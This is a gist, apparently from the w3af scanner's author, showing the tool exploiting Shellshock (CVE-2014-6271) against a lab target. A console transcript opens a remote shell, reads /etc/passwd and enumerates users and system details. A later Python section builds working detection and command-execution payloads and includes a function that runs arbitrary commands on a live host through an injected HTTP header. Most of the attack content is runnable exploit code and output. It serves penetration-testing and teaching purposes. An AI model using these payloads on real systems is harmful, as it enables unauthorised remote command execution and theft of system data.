Last active: August 29, 2015 14:06
Gist: andresriancho/1a259f01312c0c5ddd1e
w3af can now exploit shell shock!
w3af>>> plugins
w3af/plugins>>> audit shell_shock
w3af/plugins>>> back
w3af>>> target
w3af/config:target>>> set target http://shellshock.notsosecure.com/cgi-bin/status
w3af/config:target>>> back
The configuration has been saved.
w3af>>> start
Shell shock was found at: "http://shellshock.notsosecure.com/cgi-bin/status", using HTTP method GET.
The modified header was: "User-Agent" and it's value was: "() { :;}; echo "shellshock: check"".
This vulnerability was found in the request with id 33.
Scan finished in 8 seconds.
Stopping the core...
w3af>>> exploit
w3af/exploit>>> exploit os_commanding
os_commanding exploit plugin is starting.
Vulnerability successfully exploited.
Generated shell object <os_commanding object (ruser: "pentesterlab" | rsystem: "Linux vulnerable 3.14.1-pentesterlab")>
Vulnerability successfully exploited. This is a list of available shells and proxies:
- [0] <os_commanding object (ruser: "pentesterlab" | rsystem: "Linux vulnerable 3.14.1-pentesterlab")>
Please use the interact command to interact with the shell objects.
w3af/exploit>>> interact 0
Execute "exit" to get out of the remote shell.
Commands typed in this menu will be run through the os_commanding shell.
w3af/exploit/os_commanding-0>>> e cat /etc/passwd
root:x:0:0:root:/root:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/false
tc:x:1001:50:Linux User,,,:/home/tc:/bin/sh
pentesterlab:x:1000:50:Linux User,,,:/home/pentesterlab:/bin/sh
w3af/exploit/os_commanding-0>>> e ls -la /
total 4
drwxr-xr-x 18 tc staff 400 Sep 25 12:05 .
drwxr-xr-x 18 tc staff 400 Sep 25 12:05 ..
drwxr-xr-x 2 root root 1500 Sep 25 12:05 bin
drwxr-xr-x 2 root root 60 Sep 25 12:05 boot
drwxrwxr-x 14 root staff 4360 Sep 25 12:05 dev
drwxr-xr-x 10 root root 800 Sep 25 14:42 etc
drwxrwxr-x 3 root staff 60 Sep 25 12:05 home
-rwxr-xr-x 1 root root 496 Sep 25 09:57 init
drwxr-xr-x 5 root root 860 Sep 25 12:05 lib
lrwxrwxrwx 1 root root 11 Sep 25 12:05 linuxrc -> bin/busybox
drwxr-xr-x 4 root root 80 Sep 25 12:05 mnt
drwxr-xr-x 2 root root 160 Sep 25 12:05 opt
dr-xr-xr-x 68 root root 0 Sep 25 12:05 proc
drwxrwxr-x 2 root staff 120 Sep 25 12:28 root
drwxrwxr-x 4 root staff 80 Sep 25 12:05 run
drwxr-xr-x 2 root root 1200 Sep 25 12:05 sbin
dr-xr-xr-x 12 root root 0 Sep 25 12:05 sys
drwxrwxrwt 4 root staff 140 Sep 25 12:54 tmp
drwxr-xr-x 8 root root 200 Sep 25 12:05 usr
drwxr-xr-x 9 root root 200 Sep 25 06:30 var
w3af/exploit/os_commanding-0>>> e whoami
pentesterlab
w3af/exploit/os_commanding-0>>> help
Available commands:
help Display this information
lsp List payloads
payload <payload> Execute "payload" and get the result
read <file> Read the remote server <file> and echo to this console
write <file> <content> Write <content> to the remote <file>
upload <local> <remote> Upload <local> file to <remote> location
execute <cmd>
exec <cmd>
e <cmd> Run <cmd> on the remote operating system
exit Exit this shell session
w3af/exploit/os_commanding-0>>> lsp
apache_config_directory
apache_config_files
apache_htaccess
apache_mod_security
...
udp
uptime
users
users_config_files
w3af_agent
w3af/exploit/os_commanding-0>>> payload users
|----------------------------------------------------------------------------|
| User | Home directory | Shell | Description |
|----------------------------------------------------------------------------|
| nobody | /nonexistent/ | /bin/false | nobody |
| root | /root/ | /bin/sh | root |
| tc | /home/tc/ | /bin/sh | Linux User |
| lp | /var/spool/lpd/ | /bin/sh | lp |
| pentesterlab | /home/pentesterlab/ | /bin/sh | Linux User |
|----------------------------------------------------------------------------|
w3af/exploit/os_commanding-0>>> payload cpu_info
|-----------------------------------------------------------------------------|
| Description | Value |
|-----------------------------------------------------------------------------|
| cpu_info | AMD Opteron(TM) Processor 6272 |
| cpu_cores | 1 |
|-----------------------------------------------------------------------------|
w3af/exploit/os_commanding-0>>> payload uptime
|----------------------------------------------------------------------------|
| Description | Hours | Minutes | Seconds |
|----------------------------------------------------------------------------|
| idletime | 25 | 16 | 54 |
| uptime | 25 | 17 | 37 |
|----------------------------------------------------------------------------|
w3af/exploit/os_commanding-0>>>
Exploitation is really nice here because it needs no third-party host to catch a reverse shell or collect results, and no staging payload: the command travels in the HTTP request header and its output comes back in the same HTTP response, so the whole thing is one request/response round trip.
The shell-shock exploit source code is available here and, as you'll see, it fits right into our framework.
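To make the in-band mechanism concrete, here is an added example (my own code, not w3af's shell_shock or os_commanding plugins, whose internals this page does not show). It builds the same detection payload the scan above used, decides vulnerability by looking for the echoed "shellshock: check" line among the response headers, and builds an exploitation payload that prints a Content-Type line and a blank line so the command's stdout becomes the response body. The function and constant names, the Content-Type variant of the exploitation payload, and the two sample HTTP responses are my assumptions; the samples are constructed, not captured from any host, so the offline check runs without a target.

```python
"""Shellshock (CVE-2014-6271) in-band check and command execution over HTTP.

Added example for this page; it is not w3af's own shell_shock or
os_commanding code. It assumes a CGI endpoint that copies the chosen request
header (User-Agent here) into an environment variable that an unpatched bash
imports as a function definition.
"""
import http.client
from urllib.parse import urlsplit

MARKER_HEADER = "shellshock"   # assumed names, matching the transcript above
MARKER_VALUE = "check"


def detection_payload(header=MARKER_HEADER, value=MARKER_VALUE):
    """Detection payload: a bash function definition followed by a trailing command.
    Unpatched bash runs the trailing 'echo' while importing the variable; because
    that happens before the CGI script prints its own headers, the web server
    relays the echoed line as an extra HTTP response header."""
    return '() { :;}; echo "%s: %s"' % (header, value)


def command_payload(cmd):
    """Exploitation payload (Content-Type variant, an assumption of this example).
    Printing a Content-Type line and a blank line closes the CGI header section,
    so the command's stdout is returned as the body of the same HTTP response."""
    quoted = "'" + cmd.replace("'", "'\\''") + "'"   # single-quote cmd for /bin/sh
    return "() { :;}; echo Content-Type: text/plain; echo; /bin/sh -c %s" % quoted


def parse_raw_response(raw):
    """Split a raw HTTP/1.x response into (status line, {lower-name: [values]}, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return lines[0], headers, body


def is_vulnerable(headers, header=MARKER_HEADER, value=MARKER_VALUE):
    """True when the injected marker came back as a response header."""
    return any(value in v.lower() for v in headers.get(header.lower(), []))


def send(url, header_name, header_value, timeout=10):
    """Send one GET carrying header_value in header_name; return (status, headers, body).
    Network helper only; the offline demo below never calls it."""
    parts = urlsplit(url)
    conn_cls = http.client.HTTPSConnection if parts.scheme == "https" else http.client.HTTPConnection
    conn = conn_cls(parts.hostname, parts.port, timeout=timeout)
    path = parts.path or "/"
    if parts.query:
        path += "?" + parts.query
    conn.request("GET", path, headers={header_name: header_value})
    resp = conn.getresponse()
    headers = {}
    for name, value in resp.getheaders():
        headers.setdefault(name.lower(), []).append(value)
    body = resp.read()
    conn.close()
    return resp.status, headers, body


def check(url, header_name="User-Agent"):
    """One request: is the marker header reflected?"""
    _, headers, _ = send(url, header_name, detection_payload())
    return is_vulnerable(headers)


def run(url, cmd, header_name="User-Agent"):
    """One request: run cmd and return its stdout from the response body."""
    _, _, body = send(url, header_name, command_payload(cmd))
    return body.decode("utf-8", "replace")


# Constructed sample responses (not captured from a real host) for an offline check.
VULNERABLE_RAW = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: Apache\r\n"
    b"shellshock: check\r\n"          # the injected line, relayed as a header
    b"Content-Type: text/html\r\n"
    b"\r\n"
    b"<html>status page</html>"
)
PATCHED_RAW = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: Apache\r\n"
    b"Content-Type: text/html\r\n"
    b"\r\n"
    b"<html>status page</html>"
)


def offline_demo():
    """Return (vulnerable sample flagged?, patched sample flagged?)."""
    return (is_vulnerable(parse_raw_response(VULNERABLE_RAW)[1]),
            is_vulnerable(parse_raw_response(PATCHED_RAW)[1]))


if __name__ == "__main__":
    print(detection_payload())
    print(command_payload("cat /etc/passwd"))
    print(offline_demo())
    # Against a live target you are authorised to test: check(url), then run(url, "whoami")
```

The detection step is deliberately side-effect free (it only echoes a header), which is why it is safe to use as a scan check; the exploitation payload only differs in what it prints before the command output, and both give their answer in the same response the request produced.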
Try it yourself!
git clone https://github.com/andresriancho/w3af.git
cd w3af
git checkout develop
./w3af_console
And then type the commands above.